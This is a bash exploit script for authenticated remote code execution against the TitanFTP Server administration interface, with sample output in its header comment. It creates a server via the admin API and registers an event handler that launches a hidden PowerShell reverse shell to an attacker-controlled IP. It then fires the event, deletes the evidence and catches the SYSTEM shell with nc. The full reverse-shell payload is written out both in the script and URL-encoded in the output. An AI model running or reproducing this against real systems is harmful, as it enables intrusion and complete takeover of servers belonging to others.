titanftp-server-admin-event-handler-rce - TitanFTP Server Administrator Event Handler Authenticated RCE
#!/bin/bash
# titanftp-server-admin-event-handler-rce - TitanFTP Server Administrator Event Handler Authenticated RCE
#
# Requires remote administration interface to be enabled. (Default port 31001/tcp).
# Creates a new server and adds an event handler to execute a PowerShell reverse shell.
# ---
# $ ./titanftp-server-admin-event-handler-rce
# TitanFTP Server Administrator Event Handler Authenticated RCE
#
# Generating PowerShell reverse shell to 172.16.191.165:1337 ...
# No encoder or badchars specified, outputting raw payload
# Payload size: 1587 bytes
# Creating server (newtitanserver) ...
# <GDAPIXML><GDAPIResponse><GDAPIStatus>200</GDAPIStatus><GDAPIErrorText>Success.</GDAPIErrorText><GDAPIExtraStatus>0</GDAPIExtraStatus><GDAPIVersion>2</GDAPIVersion></GDAPIResponse><SRResponse></SRResponse><SRErrorInfo><SRError>0</SRError><SRErrorStr></SRErrorStr><SRSubError>0</SRSubError><SRSubErrorStr></SRSubErrorStr></SRErrorInfo></GDAPIXML>
# Adding event (11021) ...
# <GDAPIXML><GDAPIResponse><GDAPIStatus>200</GDAPIStatus><GDAPIErrorText>Success.</GDAPIErrorText><GDAPIExtraStatus>0</GDAPIExtraStatus><GDAPIVersion>2</GDAPIVersion></GDAPIResponse><SRResponse>testevent%7Ctestevent%7C1%7C1%7C1%7C0%7C0%7C3%7C1%7C11021%7C0%7C3006%7CC%3A%5Cwindows%5Csystem32%5Ccmd.exe%7C/c%20powershell.exe%20%2Dw%20hidden%20%2Dnop%20%2Dc%20%24a%3D%27172.16.191.165%27%3B%24b%3D1337%3B%24c%3DNew%2DObject%20system.net.sockets.tcpclient%3B%24nb%3DNew%2DObject%20System.Byte%5B%5D%20%24c.ReceiveBufferSize%3B%24ob%3DNew%2DObject%20System.Byte%5B%5D%2065536%3B%24eb%3DNew%2DObject%20System.Byte%5B%5D%2065536%3B%24e%3Dnew%2Dobject%20System.Text.UTF8Encoding%3B%24p%3DNew%2DObject%20System.Diagnostics.Process%3B%24p.StartInfo.FileName%3D%27cmd.exe%27%3B%24p.StartInfo.RedirectStandardInput%3D1%3B%24p.StartInfo.RedirectStandardOutput%3D1%3B%24p.StartInfo.RedirectStandardError%3D1%3B%24p.StartInfo.UseShellExecute%3D0%3B%24q%3D%24p.Start%28%29%3B%24is%3D%24p.StandardInput%3B%24os%3D%24p.StandardOutput%3B%24es%3D%24p.StandardError%3B%24osread%3D%24os.BaseStream.BeginRead%28%24ob%2C%200%2C%20%24ob.Length%2C%20%24null%2C%20%24null%29%3B%24esread%3D%24es.BaseStream.BeginRead%28%24eb%2C%200%2C%20%24eb.Length%2C%20%24null%2C%20%24null%29%3B%24c.connect%28%24a%2C%24b%29%3B%24s%3D%24c.GetStream%28%29%3Bwhile%20%28%24true%29%20%7B%20%20%20%20start%2Dsleep%20%2Dm%20100%3B%20%20%20%20if%20%28%24osread.IsCompleted%20%2Dand%20%24osread.Result%20%2Dne%200%29%20%7B%20%20%20%20%20%20%24r%3D%24os.BaseStream.EndRead%28%24osread%29%3B%20%20%20%20%20%20%24s.Write%28%24ob%2C0%2C%24r%29%3B%20%20%20%20%20%20%24s.Flush%28%29%3B%20%20%20%20%20%20%24osread%3D%24os.BaseStream.BeginRead%28%24ob%2C%200%2C%20%24ob.Length%2C%20%24null%2C%20%24null%29%3B%20%20%20%20%7D%20%20%20%20if%20%28%24esread.IsCompleted%20%2Dand%20%24esread.Result%20%2Dne%200%29%20%7B%20%20%20%20%20%20%24r%3D%24es.BaseStream.EndRead%28%24esread%29%3B%20%20%20%20%20%20%24s.Write%28%24eb%2C0%2C%24r%29%3B%20%20%20%20%20%20%24s.Flush%28%29%3B%20%20%20%20%20%20%24esread%3D%24es.BaseStream.BeginRead%28%24eb%2C%200%2C%20%24eb.Length%2C%20%24null%2C%20%24null%29%3B%20%20%20%20%7D%20%20%20%20if%20%28%24s.DataAvailable%29%20%7B%20%20%20%20%20%20%24r%3D%24s.Read%28%24nb%2C0%2C%24nb.Length%29%3B%20%20%20%20%20%20if%20%28%24r%20%2Dlt%201%29%20%7B%20%20%20%20%20%20%20%20%20%20break%3B%20%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%20%24str%3D%24e.GetString%28%24nb%2C0%2C%24r%29%3B%20%20%20%20%20%20%20%20%20%20%24is.write%28%24str%29%3B%20%20%20%20%20%20%7D%20%20%20%20%7D%20%20%20%20if%20%28%24c.Connected%20%2Dne%20%24true%20%2Dor%20%28%24c.Client.Poll%281%2C%5BSystem.Net.Sockets.SelectMode%5D%3A%3ASelectRead%29%20%2Dand%20%24c.Client.Available%20%2Deq%200%29%29%20%7B%20%20%20%20%20%20%20%20break%3B%20%20%20%20%7D%20%20%20%20if%20%28%24p.ExitCode%20%2Dne%20%24null%29%20%7B%20%20%20%20%20%20%20%20break%3B%20%20%20%20%7D%7D%7C0%7C0%7C60%7C0%7C0%7C</SRResponse><SRErrorInfo><SRError>0</SRError><SRErrorStr></SRErrorStr><SRSubError>0</SRSubError><SRSubErrorStr></SRSubErrorStr></SRErrorInfo></GDAPIXML>
# Executing event ...
# <GDAPIXML><GDAPIResponse><GDAPIStatus>200</GDAPIStatus><GDAPIErrorText>Success.</GDAPIErrorText><GDAPIExtraStatus>0</GDAPIExtraStatus><GDAPIVersion>2</GDAPIVersion></GDAPIResponse><SRResponse></SRResponse><SRErrorInfo><SRError>0</SRError><SRErrorStr></SRErrorStr><SRSubError>0</SRSubError><SRSubErrorStr></SRSubErrorStr></SRErrorInfo></GDAPIXML>
# Removing event ...
# <GDAPIXML><GDAPIResponse><GDAPIStatus>200</GDAPIStatus><GDAPIErrorText>Success.</GDAPIErrorText><GDAPIExtraStatus>0</GDAPIExtraStatus><GDAPIVersion>2</GDAPIVersion></GDAPIResponse><SRResponse></SRResponse><SRErrorInfo><SRError>0</SRError><SRErrorStr></SRErrorStr><SRSubError>0</SRSubError><SRSubErrorStr></SRSubErrorStr></SRErrorInfo></GDAPIXML>
# Removing server ...
# <GDAPIXML><GDAPIResponse><GDAPIStatus>200</GDAPIStatus><GDAPIErrorText>Success.</GDAPIErrorText><GDAPIExtraStatus>0</GDAPIExtraStatus><GDAPIVersion>2</GDAPIVersion></GDAPIResponse><SRResponse></SRResponse><SRErrorInfo><SRError>0</SRError><SRErrorStr></SRErrorStr><SRSubError>0</SRSubError><SRSubErrorStr></SRSubErrorStr></SRErrorInfo></GDAPIXML>
# Listening on port 1337 ...
# Ncat: Version 7.80 ( https://nmap.org/ncat )
# Ncat: Listening on :::1337
# Ncat: Listening on 0.0.0.0:1337
# Ncat: Connection from 172.16.191.242.
# Ncat: Connection from 172.16.191.242:55477.
# Microsoft Windows [Version 6.1.7601]
# Copyright (c) 2009 Microsoft Corporation. All rights reserved.
#
# C:\Windows\system32>whoami
# whoami
# nt authority\system
# ---
# ~ bcoles
# target
RHOST="http://172.16.191.242:31001/admin.dll"
CREDS="Administrator:123"
# connect back
LHOST="172.16.191.165"
LPORT=1337
echo "TitanFTP Server Administrator Event Handler Authenticated RCE"
echo
echo "Generating PowerShell reverse shell to ${LHOST}:${LPORT} ..."
if command -v msfvenom; then
PAYLOAD=$(msfvenom --arch cmd --platform windows -p cmd/windows/reverse_powershell LHOST="${LHOST}" LPORT="${LPORT}")
else
# ./msfvenom -p cmd/windows/reverse_powershell LHOST=172.16.191.165 LPORT=1337 | sed 's/\$/\\\$/g'
PAYLOAD="powershell.exe -w hidden -nop -c \$a='${LHOST}';\$b=${LPORT};\$c=New-Object system.net.sockets.tcpclient;\$nb=New-Object System.Byte[] \$c.ReceiveBufferSize;\$ob=New-Object System.Byte[] 65536;\$eb=New-Object System.Byte[] 65536;\$e=new-object System.Text.UTF8Encoding;\$p=New-Object System.Diagnostics.Process;\$p.StartInfo.FileName='cmd.exe';\$p.StartInfo.RedirectStandardInput=1;\$p.StartInfo.RedirectStandardOutput=1;\$p.StartInfo.RedirectStandardError=1;\$p.StartInfo.UseShellExecute=0;\$q=\$p.Start();\$is=\$p.StandardInput;\$os=\$p.StandardOutput;\$es=\$p.StandardError;\$osread=\$os.BaseStream.BeginRead(\$ob, 0, \$ob.Length, \$null, \$null);\$esread=\$es.BaseStream.BeginRead(\$eb, 0, \$eb.Length, \$null, \$null);\$c.connect(\$a,\$b);\$s=\$c.GetStream();while (\$true) { start-sleep -m 100; if (\$osread.IsCompleted -and \$osread.Result -ne 0) { \$r=\$os.BaseStream.EndRead(\$osread); \$s.Write(\$ob,0,\$r); \$s.Flush(); \$osread=\$os.BaseStream.BeginRead(\$ob, 0, \$ob.Length, \$null, \$null); } if (\$esread.IsCompleted -and \$esread.Result -ne 0) { \$r=\$es.BaseStream.EndRead(\$esread); \$s.Write(\$eb,0,\$r); \$s.Flush(); \$esread=\$es.BaseStream.BeginRead(\$eb, 0, \$eb.Length, \$null, \$null); } if (\$s.DataAvailable) { \$r=\$s.Read(\$nb,0,\$nb.Length); if (\$r -lt 1) { break; } else { \$str=\$e.GetString(\$nb,0,\$r); \$is.write(\$str); } } if (\$c.Connected -ne \$true -or (\$c.Client.Poll(1,[System.Net.Sockets.SelectMode]::SelectRead) -and \$c.Client.Available -eq 0)) { break; } if (\$p.ExitCode -ne \$null) { break; }}"
fi
#echo "Retrieving servers ..."
#curl -is --user "${CREDS}" -X POST "${RHOST}" -H "SRT-XMLRequest: true" -H "SRT-WantXMLResponses: true" \
# --data "<SRRequest><Target>DOM</Target><Action>ENUM</Action><ServerName/><Payload></Payload></SRRequest>"
SERVER_NAME="newtitanserver"
echo "Creating server (${SERVER_NAME}) ..."
curl -s --user "${CREDS}" -X POST "${RHOST}" -H "SRT-XMLRequest: true" -H "SRT-WantXMLResponses: true" \
--data "<SRRequest><Target>SVR</Target><Action>CREATE</Action><ServerName>${SERVER_NAME}</ServerName><Payload><fxServerParams><RunAtStartup>1</RunAtStartup><ServerName>${SERVER_NAME}</ServerName><ServerDesc>${SERVER_NAME}</ServerDesc><Host>0.0.0.0</Host></fxServerParams></Payload></SRRequest>"
#EVENT_TYPE="11070" # "Connection attempt succeeded"
#EVENT_TYPE="11071" # "Connection attempt failed"
EVENT_TYPE="11021" # "Server start failed"
echo "Adding event (${EVENT_TYPE}) ..."
curl -s --user "${CREDS}" -X POST "${RHOST}" -H "SRT-XMLRequest: true" -H "SRT-WantXMLResponses: true" \
--data "<SRRequest><Target>SVR</Target><Action>MODEVENT</Action><ServerName>${SERVER_NAME}</ServerName><Payload>A|testevent|testevent|1|1|1|0|0|3|0|${EVENT_TYPE}|0|3006|C:\\windows\\system32\\cmd.exe|/c ${PAYLOAD}|0|0|60|0|0|</Payload></SRRequest>"
EVENT_ID="1"
echo "Executing event ..."
curl -s --user "${CREDS}" -X POST "${RHOST}" -H "SRT-XMLRequest: true" -H "SRT-WantXMLResponses: true" \
--data "<SRRequest><Target>SVR</Target><Action>MODEVENT</Action><ServerName>${SERVER_NAME}</ServerName><Payload>F|${EVENT_ID}|</Payload></SRRequest>"
echo "Removing event ..."
curl -s --user "${CREDS}" -X POST "${RHOST}" -H "SRT-XMLRequest: true" -H "SRT-WantXMLResponses: true" \
--data "<SRRequest><Target>SVR</Target><Action>MODEVENT</Action><ServerName>${SERVER_NAME}</ServerName><Payload>D|${EVENT_ID}|</Payload></SRRequest>"
echo "Removing server ..."
curl -s --user "${CREDS}" -X POST "${RHOST}" -H "SRT-XMLRequest: true" -H "SRT-WantXMLResponses: true" \
--data "<SRRequest><Target>SVR</Target><Action>DELETE</Action><ServerName>${SERVER_NAME}</ServerName><Payload></Payload></SRRequest>"
echo "Listening on port ${LPORT} ..."
nc -lvp "${LPORT}"